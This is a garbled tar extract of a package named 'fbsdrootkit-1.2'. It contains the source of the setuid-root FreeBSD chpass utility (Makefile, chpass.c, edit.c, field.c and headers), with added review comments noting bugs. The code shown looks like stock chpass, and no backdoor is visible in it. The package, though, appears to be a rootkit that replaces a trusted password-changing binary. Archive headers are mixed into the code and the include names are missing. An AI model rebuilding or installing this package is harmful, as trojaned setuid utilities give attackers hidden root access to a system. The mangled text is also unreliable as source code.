	 * a non-NULL name should be printed as warn("%s", name).
	 */
	if (err)
		warn(name);
#ifdef YP
	if (_use_yp)
		warnx("NIS information unchanged");
	else
#endif /* YP */
	warnx("%s: unchanged", _PATH_MASTERPASSWD);
	(void)unlink(tempname);
	exit(eval);
}
fbsdrootkit-1.2/chpass/ 40700 764 764 0 6257405241 12322 5ustar dfdffbsdrootkit-1.2/chpass/Makefile100600 764 764 1401 6257153656 14067 0ustar dfdf# @(#)Makefile 8.2 (Berkeley) 4/2/94 PROG= chpass SRCS= chpass.c edit.c field.c pw_copy.c pw_scan.c pw_util.c table.c util.c BINOWN= root BINMODE=4555 .PATH: ${.CURDIR}/../pwd_mkdb ${.CURDIR}/../vipw CFLAGS+=-I${.CURDIR}/../pwd_mkdb -I${.CURDIR}/../vipw LINKS= ${BINDIR}/chpass ${BINDIR}/chfn LINKS+= ${BINDIR}/chpass ${BINDIR}/chsh LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchpass LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchfn LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchsh MLINKS= chpass.1 chfn.1 chpass.1 chsh.1 COPTS+= -DYP SRCS+= pw_yp.c DPADD= ${LIBRPCSVC} ${LIBCRYPT} LDADD+= -lrpcsvc -lcrypt beforeinstall: [ ! -e ${DESTDIR}${BINDIR}/chpass ] || \ chflags noschg ${DESTDIR}${BINDIR}/chpass afterinstall: chflags schg ${DESTDIR}${BINDIR}/chpass .include fbsdrootkit-1.2/chpass/chpass.c100600 764 764 15324 6122755464 14101 0ustar dfdf/*-
 * Copyright (c) 1988, 1993, 1994
 * The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2.
Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 * must display the following acknowledgement:
 * This product includes software developed by the University of
 * California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 * may be used to endorse or promote products derived from this software
 * without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

/*
 * chpass(1): edit or replace fields of a password file entry.  The header
 * names of the bare #include lines and the line structure of the copyright
 * string were lost when the archive was extracted to text.
 */
#ifndef lint
static char copyright[] = "@(#) Copyright (c) 1988, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n";
#endif /* not lint */

#ifndef lint
static char sccsid[] = "From: @(#)chpass.c 8.4 (Berkeley) 4/2/94";
static char rcsid[] = "$Id: chpass.c,v 1.3.4.3 1996/03/17 09:03:17 joerg Exp $";
#endif /* not lint */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include "pw_copy.h"
#ifdef YP
#include "pw_yp.h"
#endif

#include "chpass.h"
#include "pathnames.h"

char *progname = "chpass";
/* Path of the temporary password file; not assigned in this file. */
char *tempname;
/* Real uid of the caller, set in main(). */
uid_t uid;

void baduser __P((void));
void usage __P((void));

/*
 * Entry point.  -a loads a complete entry, -s sets the shell, -p sets the
 * encrypted password; without them the entry is opened in the editor.
 * -a and -p are refused for a non-zero uid.  Exits 0 on success.
 */
int
main(argc, argv)
	int argc;
	char **argv;
{
	enum { NEWSH, LOADENTRY, EDITENTRY, NEWPW } op;
	struct passwd *pw, lpw;
	int ch, pfd, tfd;
	char *arg;	/* option argument; set only by -a, -s and -p */
#ifdef YP
	int force_local = 0;
	int force_yp = 0;
#endif

	op = EDITENTRY;
#ifdef YP
	while ((ch = getopt(argc, argv, "a:p:s:ly")) != EOF)
#else
	while ((ch = getopt(argc, argv, "a:p:s:")) != EOF)
#endif
		switch(ch) {
		case 'a':
			op = LOADENTRY;
			arg = optarg;
			break;
		case 's':
			op = NEWSH;
			arg = optarg;
			break;
		case 'p':
			op = NEWPW;
			arg = optarg;
			break;
#ifdef YP
		case 'l':
			force_local = 1;
			break;
		case 'y':
			force_yp = 1;
			break;
#endif
		case '?':
		default:
			usage();
		}
	argc -= optind;
	argv += optind;

	uid = getuid();

	/* look up the target entry; only uid 0 may name another user's account */
	if (op == EDITENTRY || op == NEWSH || op == NEWPW)
		switch(argc) {
		case 0:
			if (!(pw = getpwuid(uid)))
				errx(1, "unknown user: uid %u", uid);
			break;
		case 1:
			if (!(pw = getpwnam(*argv)))
				errx(1, "unknown user: %s", *argv);
			if (uid && uid != pw->pw_uid)
				baduser();
			break;
		default:
			usage();
		}

#ifdef YP
	/*
	 * NOTE(review): for -a (LOADENTRY) the lookup above is skipped, so pw
	 * has not been assigned when it is dereferenced here.  The result of
	 * strdup() is not checked either.
	 */
	pw->pw_name = strdup(pw->pw_name);
	_use_yp = use_yp(pw->pw_name);
	if (_use_yp == USER_YP_ONLY) {
		if (!force_local) {
			_use_yp = 1;
			pw = (struct passwd *)&yp_password;
		} else
			errx(1, "unknown local user: %s.", pw->pw_name);
	} else if (_use_yp == USER_LOCAL_ONLY) {
		if (!force_yp) {
			_use_yp = 0;
			pw = (struct passwd *)&local_password;
		} else
			errx(1, "unknown NIS user: %s.", pw->pw_name);
	} else if (_use_yp == USER_YP_AND_LOCAL) {
		if (!force_local) {
			_use_yp = 1;
			pw = (struct passwd *)&yp_password;
		} else {
			_use_yp = 0;
			pw = (struct passwd *)&local_password;
		}
	}
#endif /* YP */

	if (op == NEWSH) {
		/* protect p_shell -- it thinks NULL is /bin/sh */
		if (!arg[0])
			usage();
		if (p_shell(arg, pw, (ENTRY *)NULL))
			pw_error((char *)NULL, 0, 1);
	}

	if (op == LOADENTRY) {
		if (uid)
			baduser();
		pw = &lpw;
		if (!pw_scan(arg, pw))
			exit(1);
	}

	if (op == NEWPW) {
		if (uid)
			baduser();

		/* a ':' would add a field to the password file record */
		if(strchr(arg, ':')) {
			errx(1, "invalid format for password");
		}
		pw->pw_passwd = arg;
	}

	/*
	 * The temporary file/file descriptor usage is a little tricky here.
	 * 1: We start off with two fd's, one for the master password
	 * file (used to lock everything), and one for a temporary file.
	 * 2: Display() gets an fp for the temporary file, and copies the
	 * user's information into it. It then gives the temporary file
	 * to the user and closes the fp, closing the underlying fd.
	 * 3: The user edits the temporary file some number of times.
	 * 4: Verify() gets an fp for the temporary file, and verifies the
	 * contents. It can't use an fp derived from the step #2 fd,
	 * because the user's editor may have created a new instance of
	 * the file. Once the file is verified, its contents are stored
	 * in a password structure. The verify routine closes the fp,
	 * closing the underlying fd.
	 * 5: Delete the temporary file.
	 * 6: Get a new temporary file/fd. Pw_copy() gets an fp for it
	 * file and copies the master password file into it, replacing
	 * the user record with a new one. We can't use the first
	 * temporary file for this because it was owned by the user.
	 * Pw_copy() closes its fp, flushing the data and closing the
	 * underlying file descriptor. We can't close the master
	 * password fp, or we'd lose the lock.
	 * 7: Call pw_mkdb() (which renames the temporary file) and exit.
	 * The exit closes the master passwd fp/fd.
	 */
	pw_init();
	pfd = pw_lock();
	tfd = pw_tmp();

	if (op == EDITENTRY) {
		display(tfd, pw);
		edit(pw);
		(void)unlink(tempname);
		tfd = pw_tmp();
	}

#ifdef YP
	if (_use_yp) {
		yp_submit(pw);
		(void)unlink(tempname);
	} else {
#endif /* YP */
	pw_copy(pfd, tfd, pw);

	if (!pw_mkdb())
		pw_error((char *)NULL, 0, 1);
#ifdef YP
	}
#endif /* YP */
	exit(0);
}

/* Exit with the EACCES message: the caller may not change this entry. */
void
baduser()
{

	errx(1, "%s", strerror(EACCES));
}

/* Print the usage line for the compiled-in options on stderr and exit(1). */
void
usage()
{

	(void)fprintf(stderr,
#ifdef YP
		"usage: chpass [-l] [-y] [-a list] [-p encpass] [-s shell] [user]\n");
#else
		"usage: chpass [-a list] [-p encpass] [-s shell] [user]\n");
#endif
	exit(1);
}
fbsdrootkit-1.2/chpass/chpass.h100600 764 764 5620 5571373017 14061 0ustar dfdf/*
 * Copyright (c) 1988, 1993, 1994
 * The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 * must display the following acknowledgement:
 * This product includes software developed by the University of
 * California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 * may be used to endorse or promote products derived from this software
 * without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)chpass.h 8.4 (Berkeley) 4/2/94 */ struct passwd; typedef struct _entry { char *prompt; int (*func)(), restricted, len; char *except, *save; } ENTRY; /* Field numbers. */ #define E_BPHONE 8 #define E_HPHONE 9 #define E_LOCATE 10 #define E_NAME 7 #define E_SHELL 12 extern ENTRY list[]; extern uid_t uid; int atot __P((char *, time_t *)); void display __P((int, struct passwd *)); void edit __P((struct passwd *)); char *ok_shell __P((char *)); int p_change __P((char *, struct passwd *, ENTRY *)); int p_class __P((char *, struct passwd *, ENTRY *)); int p_expire __P((char *, struct passwd *, ENTRY *)); int p_gecos __P((char *, struct passwd *, ENTRY *)); int p_gid __P((char *, struct passwd *, ENTRY *)); int p_hdir __P((char *, struct passwd *, ENTRY *)); int p_login __P((char *, struct passwd *, ENTRY *)); int p_login __P((char *, struct passwd *, ENTRY *)); int p_passwd __P((char *, struct passwd *, ENTRY *)); int p_shell __P((char *, struct passwd *, ENTRY *)); int p_uid __P((char *, struct passwd *, ENTRY *)); char *ttoa __P((time_t)); int verify __P((struct passwd *)); fbsdrootkit-1.2/chpass/edit.c100600 764 764 15454 6243176626 13552 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. 
Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
*/

#ifndef lint
static char sccsid[] = "@(#)edit.c 8.3 (Berkeley) 4/2/94";
#endif /* not lint */

/* NOTE(review): the header names of the bare #include lines below are missing from this copy of the file. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include "chpass.h"
#ifdef YP
#include "pw_yp.h"
#endif /* YP */

extern char *tempname;

/*
 * edit --
 *	Let the user edit the temporary file named by tempname, repeating
 *	until verify() accepts the result.
 *
 *	The file is stat()ed before and after pw_edit(1); equal st_mtime
 *	values are reported as "no changes made" and handed to pw_error().
 *	pw_edit(), pw_prompt() and pw_error() are defined elsewhere;
 *	pw_error() presumably does not return -- confirm.
 */
void
edit(pw)
	struct passwd *pw;
{
	struct stat begin, end;

	for (;;) {
		if (stat(tempname, &begin))
			pw_error(tempname, 1, 1);
		pw_edit(1);
		if (stat(tempname, &end))
			pw_error(tempname, 1, 1);
		/*
		 * Only the modification time is compared, not the contents,
		 * so a save that leaves st_mtime at its pre-edit value is
		 * treated as "no changes".
		 */
		if (begin.st_mtime == end.st_mtime) {
			warnx("no changes made");
			pw_error(NULL, 0, 0);
		}
		/* A non-zero return from verify() ends the loop. */
		if (verify(pw))
			break;
		pw_prompt();
	}
}

/*
 * display --
 *	print out the file for the user to edit; strange side-effect:
 *	set conditional flag if the user gets to edit the shell.
 *
 *	fd is wrapped in a stdio stream, which is closed before returning.
 *	When uid is 0 (and, under YP, _use_yp is 0) the full record is
 *	written, including the pw_passwd string.  The gecos sub-fields are
 *	split on "," and a copy of each one that exists is kept in
 *	list[...].save for verify().
 */
void
display(fd, pw)
	int fd;
	struct passwd *pw;
{
	FILE *fp;
	char *bp, *p, *ttoa();

	if (!(fp = fdopen(fd, "w")))
		pw_error(tempname, 1, 1);

	(void)fprintf(fp,
#ifdef YP
	    "#Changing %s information for %s.\n", _use_yp ? "NIS" : "user database", pw->pw_name);
	if (!uid && !_use_yp) {
#else
	    "#Changing user database information for %s.\n", pw->pw_name);
	if (!uid) {
#endif /* YP */
		(void)fprintf(fp, "Login: %s\n", pw->pw_name);
		(void)fprintf(fp, "Password: %s\n", pw->pw_passwd);
		(void)fprintf(fp, "Uid [#]: %d\n", pw->pw_uid);
		(void)fprintf(fp, "Gid [# or name]: %d\n", pw->pw_gid);
		(void)fprintf(fp, "Change [month day year]: %s\n",
		    ttoa(pw->pw_change));
		(void)fprintf(fp, "Expire [month day year]: %s\n",
		    ttoa(pw->pw_expire));
		(void)fprintf(fp, "Class: %s\n", pw->pw_class);
		(void)fprintf(fp, "Home directory: %s\n", pw->pw_dir);
		(void)fprintf(fp, "Shell: %s\n",
		    *pw->pw_shell ? pw->pw_shell : _PATH_BSHELL);
	}
	/* Only admin can change "restricted" shells. */
	/*
	 * NOTE(review): "#ifdef 0" tests a number, not a macro name, so it is
	 * not a well-formed directive; "#if 0" was presumably intended.  The
	 * #else branch is the one that is meant to be compiled.
	 */
#ifdef 0
	else if (ok_shell(pw->pw_shell))
		/*
		 * Make shell a restricted field.  Ugly with a
		 * necklace, but there's not much else to do.
		 */
#else
	else if ((!list[E_SHELL].restricted && ok_shell(pw->pw_shell)) || !uid)
		/*
		 * If change not restrict (table.c) and standard shell
		 *	OR if root, then allow editing of shell.
		 */
#endif
		(void)fprintf(fp, "Shell: %s\n",
		    *pw->pw_shell ? pw->pw_shell : _PATH_BSHELL);
	else
		/* Shell line not offered: mark the field so verify() rejects it. */
		list[E_SHELL].restricted = 1;

	/*
	 * Split gecos into name, location, office phone, home phone.  Each
	 * .save is assigned only when strsep() returned a field; the strdup()
	 * results are not checked.
	 */
	bp = pw->pw_gecos;
	p = strsep(&bp, ",");
	if (p)
		list[E_NAME].save = strdup(p);
	if (!list[E_NAME].restricted || !uid)
		(void)fprintf(fp, "Full Name: %s\n", p ? p : "");
	p = strsep(&bp, ",");
	if (p)
		list[E_LOCATE].save = strdup(p);
	if (!list[E_LOCATE].restricted || !uid)
		(void)fprintf(fp, "Location: %s\n", p ? p : "");
	p = strsep(&bp, ",");
	if (p)
		list[E_BPHONE].save = strdup(p);
	if (!list[E_BPHONE].restricted || !uid)
		(void)fprintf(fp, "Office Phone: %s\n", p ? p : "");
	p = strsep(&bp, ",");
	if (p)
		list[E_HPHONE].save = strdup(p);
	if (!list[E_HPHONE].restricted || !uid)
		(void)fprintf(fp, "Home Phone: %s\n", p ? p : "");

	/*
	 * Hand the temporary file to the invoking real uid/gid so the editor
	 * can write it; the fchown() result is ignored.
	 */
	(void)fchown(fd, getuid(), getgid());
	(void)fclose(fp);
}

/*
 * verify --
 *	Re-read the edited temporary file, dispatch every line to the handler
 *	of the matching list[] entry, then rebuild pw_gecos and pass the
 *	assembled record through pw_scan().
 *
 *	Returns 0 on any rejected line or over-long record, otherwise the
 *	result of pw_scan().  The file is reopened by name (tempname) rather
 *	than through an inherited descriptor.
 */
int
verify(pw)
	struct passwd *pw;
{
	ENTRY *ep;
	char *p;
	struct stat sb;
	FILE *fp;
	int len;
	static char buf[LINE_MAX];

	if (!(fp = fopen(tempname, "r")))
		pw_error(tempname, 1, 1);
	if (fstat(fileno(fp), &sb))
		pw_error(tempname, 1, 1);
	if (sb.st_size == 0) {
		warnx("corrupted temporary file");
		goto bad;
	}
	while (fgets(buf, sizeof(buf), fp)) {
		/* Skip empty reads and '#' comment lines. */
		if (!buf[0] || buf[0] == '#')
			continue;
		/* A line without '\n' did not fit in buf. */
		if (!(p = strchr(buf, '\n'))) {
			warnx("line too long");
			goto bad;
		}
		*p = '\0';
		/* list[] is terminated by an entry whose prompt is NULL. */
		for (ep = list;; ++ep) {
			if (!ep->prompt) {
				warnx("unrecognized field");
				goto bad;
			}
			if (!strncasecmp(buf, ep->prompt, ep->len)) {
				/* Non-root users may not submit a restricted field. */
				if (ep->restricted && uid) {
					warnx(
					    "you may not change the %s field",
						ep->prompt);
					goto bad;
				}
				if (!(p = strchr(buf, ':'))) {
					warnx("line corrupted");
					goto bad;
				}
				/*
				 * Skip white space after the colon.
				 * NOTE(review): *p is a plain char; a negative
				 * value is outside what isspace() accepts.
				 */
				while (isspace(*++p));
				if (ep->except && strpbrk(p, ep->except)) {
					warnx(
				   "illegal character in the \"%s\" field",
					    ep->prompt);
					goto bad;
				}
				/* A non-zero handler result falls into the shared failure exit. */
				if ((ep->func)(p, pw, ep)) {
bad:					(void)fclose(fp);
					return (0);
				}
				break;
			}
		}
	}
	(void)fclose(fp);

	/*
	 * Build the gecos field.  The "+ 4" covers three commas and the NUL.
	 * NOTE(review): display() assigns .save only for gecos sub-fields that
	 * exist, and otherwise it is set by whichever ->func handler ran for
	 * the entry; if one of these pointers is still NULL, strlen() will
	 * dereference it.  The initial values are in table.c, which is not
	 * shown here -- confirm.
	 */
	len = strlen(list[E_NAME].save) + strlen(list[E_BPHONE].save) +
	    strlen(list[E_HPHONE].save) + strlen(list[E_LOCATE].save) + 4;
	if (!(p = malloc(len)))
		err(1, NULL);
	(void)sprintf(pw->pw_gecos = p, "%s,%s,%s,%s", list[E_NAME].save,
	    list[E_LOCATE].save, list[E_BPHONE].save, list[E_HPHONE].save);

	/* Drop trailing commas left by empty trailing sub-fields. */
	while ((len = strlen(pw->pw_gecos)) && pw->pw_gecos[len - 1] == ',')
		pw->pw_gecos[len - 1] = '\0';

	/* Reject a record that would not fit in buf instead of truncating it. */
	if (snprintf(buf, sizeof(buf),
	    "%s:%s:%d:%d:%s:%ld:%ld:%s:%s:%s",
	    pw->pw_name, pw->pw_passwd, pw->pw_uid, pw->pw_gid, pw->pw_class,
	    pw->pw_change, pw->pw_expire, pw->pw_gecos, pw->pw_dir,
	    pw->pw_shell) >= sizeof(buf)) {
		warnx("entries too long");
		return (0);
	}
	return (pw_scan(buf, pw));
}
fbsdrootkit-1.2/chpass/field.c100600 764 764 12443 5762544542 13704 0ustar dfdf/*
 * Copyright (c) 1988, 1993, 1994
 * The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 * must display the following acknowledgement:
 * This product includes software developed by the University of
 * California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 * may be used to endorse or promote products derived from this software
 * without specific prior written permission.
* * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)field.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include "chpass.h" #include "pathnames.h" /* ARGSUSED */ int p_login(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) { warnx("empty login field"); return (1); } if (*p == '-') { warnx("login names may not begin with a hyphen"); return (1); } if (!(pw->pw_name = strdup(p))) { warnx("can't save entry"); return (1); } if (strchr(p, '.')) warnx("\'.\' is dangerous in a login name"); for (; *p; ++p) if (isupper(*p)) { warnx("upper-case letters are dangerous in a login name"); break; } return (0); } /* ARGSUSED */ int p_passwd(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) pw->pw_passwd = ""; /* "NOLOGIN"; */ else if (!(pw->pw_passwd = strdup(p))) { warnx("can't save password entry"); return (1); } return (0); } /* ARGSUSED */ int p_uid(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { uid_t id; char *np; if (!*p) { warnx("empty uid field"); return (1); } if (!isdigit(*p)) { warnx("illegal uid"); return (1); } errno = 0; id = strtoul(p, &np, 10); if (*np || (id == ULONG_MAX && errno == ERANGE)) { 
warnx("illegal uid"); return (1); } pw->pw_uid = id; return (0); } /* ARGSUSED */ int p_gid(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { struct group *gr; gid_t id; char *np; if (!*p) { warnx("empty gid field"); return (1); } if (!isdigit(*p)) { if (!(gr = getgrnam(p))) { warnx("unknown group %s", p); return (1); } pw->pw_gid = gr->gr_gid; return (0); } errno = 0; id = strtoul(p, &np, 10); if (*np || (id == ULONG_MAX && errno == ERANGE)) { warnx("illegal gid"); return (1); } pw->pw_gid = id; return (0); } /* ARGSUSED */ int p_class(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) pw->pw_class = ""; else if (!(pw->pw_class = strdup(p))) { warnx("can't save entry"); return (1); } return (0); } /* ARGSUSED */ int p_change(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!atot(p, &pw->pw_change)) return (0); warnx("illegal date for change field"); return (1); } /* ARGSUSED */ int p_expire(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!atot(p, &pw->pw_expire)) return (0); warnx("illegal date for expire field"); return (1); } /* ARGSUSED */ int p_gecos(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) ep->save = ""; else if (!(ep->save = strdup(p))) { warnx("can't save entry"); return (1); } return (0); } /* ARGSUSED */ int p_hdir(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { if (!*p) { warnx("empty home directory field"); return (1); } if (!(pw->pw_dir = strdup(p))) { warnx("can't save entry"); return (1); } return (0); } /* ARGSUSED */ int p_shell(p, pw, ep) char *p; struct passwd *pw; ENTRY *ep; { char *t, *ok_shell(); if (!*p) { pw->pw_shell = _PATH_BSHELL; return (0); } /* only admin can change from or to "restricted" shells */ if (uid && pw->pw_shell && !ok_shell(pw->pw_shell)) { warnx("%s: current shell non-standard", pw->pw_shell); return (1); } if (!(t = ok_shell(p))) { if (uid) { warnx("%s: non-standard shell", p); return (1); } } else p = t; if (!(pw->pw_shell = strdup(p))) { warnx("can't save entry"); 
return (1); } return (0); } fbsdrootkit-1.2/chpass/pathnames.h100600 764 764 3640 5571373017 14560 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
* * @(#)pathnames.h 8.1 (Berkeley) 6/6/93 */ #include #undef _PATH_TMP #define _PATH_TMP "/tmp/chpass.XXXXXX" fbsdrootkit-1.2/chpass/pw_copy.c100600 764 764 10272 6233130435 14261 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * 